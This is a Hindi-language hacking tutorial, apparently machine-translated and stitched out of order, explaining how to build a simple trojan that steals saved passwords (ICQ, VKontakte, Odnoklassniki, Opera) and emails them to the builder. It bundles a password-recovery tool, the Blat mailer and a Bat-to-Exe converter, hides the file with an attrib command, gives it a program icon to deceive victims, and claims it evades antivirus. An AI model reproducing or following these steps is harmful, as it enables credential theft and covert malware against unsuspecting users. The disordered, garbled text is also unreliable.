attrib +a +s +h +r %systemroot%\wind.exe- हम अपने ऊपर गुण डालते हैं, जिससे हम खुद को नज़रों से छिपा लेते हैं।
बाहर निकलें - हम बैटिंका प्रक्रिया पूरी करते हैं और बाहर निकलते हैं।
सीएलएस - दुभाषिया में किसी भी पंक्ति के आउटपुट को साफ़ करें।
कॉपी किया गया, विंड.बैट के रूप में सहेजा गया और बैट टू एक्सई कनवर्टर प्रोग्राम का उपयोग करके exe में संकलित किया गया, फिर हमने सब कुछ एक साथ रखा, यानी, हम ब्लैट प्रोग्राम के घटकों और WinRar आर्काइवर घटक (आप डाउनलोड कर सकते हैं) लेते हैं और उन्हें चिपका देते हैं। एक निष्पादन योग्य फ़ाइल, या जिसके साथ कोई भी प्रोग्राम, सभी फ़ाइलों को अपलोड करने का पथ %SystemRoot% या %WindowsDir% या %windir% होना चाहिए।
परिणामस्वरूप, हमें एक वायरस मिलता है जिसे एंटीवायरस द्वारा नहीं उठाया जाएगा और आपके ईमेल पर फ़ाइलों के साथ एक संग्रह भेज देगा। ईमेल द्वारा आने वाली फ़ाइलों को मल्टी-पासवर्ड-रिकवरी का उपयोग करके डिक्रिप्ट किया जा सकता है, हालांकि सभी को नहीं ओपेरा से केवल wand.dat और फिर यदि इसे 11*संस्करणों में अद्यतन नहीं किया गया है तो अन्य सभी फ़ाइलों को अपने स्वयं के साथ प्रतिस्थापित करके डिक्रिप्ट किया जा सकता है।
मुझे लगता है कि हम यहीं समाप्त कर सकते हैं, लेकिन यदि आपके कोई प्रश्न हैं, तो पूछने में संकोच न करें।
आपके ध्यान के लिए धन्यवाद, शुभकामनाएँ!
©स्वैप TheHackWorld.in

यहां मैं आपको बताऊंगा कि ICQ, Vkontakte, Odnoklassniki, Mail...आदि आदि से पासवर्ड चुराने के लिए एक सरल ट्रोजन कैसे बनाया जाए...
आइए शुरू करें... सबसे पहले हमें कुछ कार्यक्रमों की आवश्यकता है:
मल्टी पासवर्ड रिकवरी - भूले हुए पासवर्ड को पुनर्प्राप्त करने के लिए एक उपयोगिता
ब्लैट एक ईमेल क्लाइंट है.
बैट टू एक्सई कनवर्टर - बैट-एक्सई प्रारूप कनवर्टर।
आप यह सब एक संग्रह में डाउनलोड कर सकते हैं:

लिंक देखने के लिए आपको पंजीकृत होना होगा.

डाउनलोड करें और एक अलग फ़ोल्डर में अनपैक करें...
अब नोटपैड के साथ "1.bat" फ़ाइल खोलें... और Yandex मेल से अपने लॉगिन में "लॉगिन" शब्द बदलें... और Yandex मेल से अपने पासवर्ड में "पासवर्ड" शब्द बदलें...

सहेजें और बंद करें...
अब "Bat_To_Exe_Converter" खोलें...
"बैच फ़ाइल" फ़ील्ड में, आपके द्वारा सहेजी गई फ़ाइल "1.bat" इंगित करें
"इस रूप में सहेजें" फ़ील्ड को बदला नहीं जा सकता...
नीचे दिखाए अनुसार सेटिंग सेट करें:

अब "शामिल करें" टैब पर जाएं...
और "ब्लैट" और "एमपीआर..." फ़ोल्डरों से सभी फ़ाइलें वहां स्थानांतरित करें।

उनमें से बिल्कुल सात होने चाहिए!!! जैसा कि ऊपर दिखाया गया है!!!
खैर, अब अपने ट्रोजन में एक आइकन जोड़ें... यह आवश्यक नहीं है, लेकिन यह किसी प्रकार के प्रोग्राम जैसा दिखता है...
"संस्करण सूचना" टैब पर जाएं और "आइकन फ़ाइल" फ़ील्ड में आइकन चुनें....
"संकलन" पर क्लिक करें...
हम इंतजार कर रहे हैं... डाउनलोड पूरा होने का... और "1.bat" फ़ाइल वाले फ़ोल्डर की जांच करें... आपका ट्रोजन "1.exe" वहां दिखाई देना चाहिए (आप इसे अपनी पसंद के अनुसार नाम दे सकते हैं)

)...
खैर, अब देखते हैं... हमारे कंप्यूटर पर ट्रोजन लॉन्च करें और प्रतीक्षा करें... 30 सेकंड में... एक फ़ाइल आपके ईमेल पर भेजी जाएगी... इसे डाउनलोड करें (पासवर्ड इसमें संग्रहीत हैं)
डाउनलोड हो गया... अब हम इसे "एमपीआर" के माध्यम से लॉन्च करते हैं और पासवर्ड की प्रशंसा करते हैं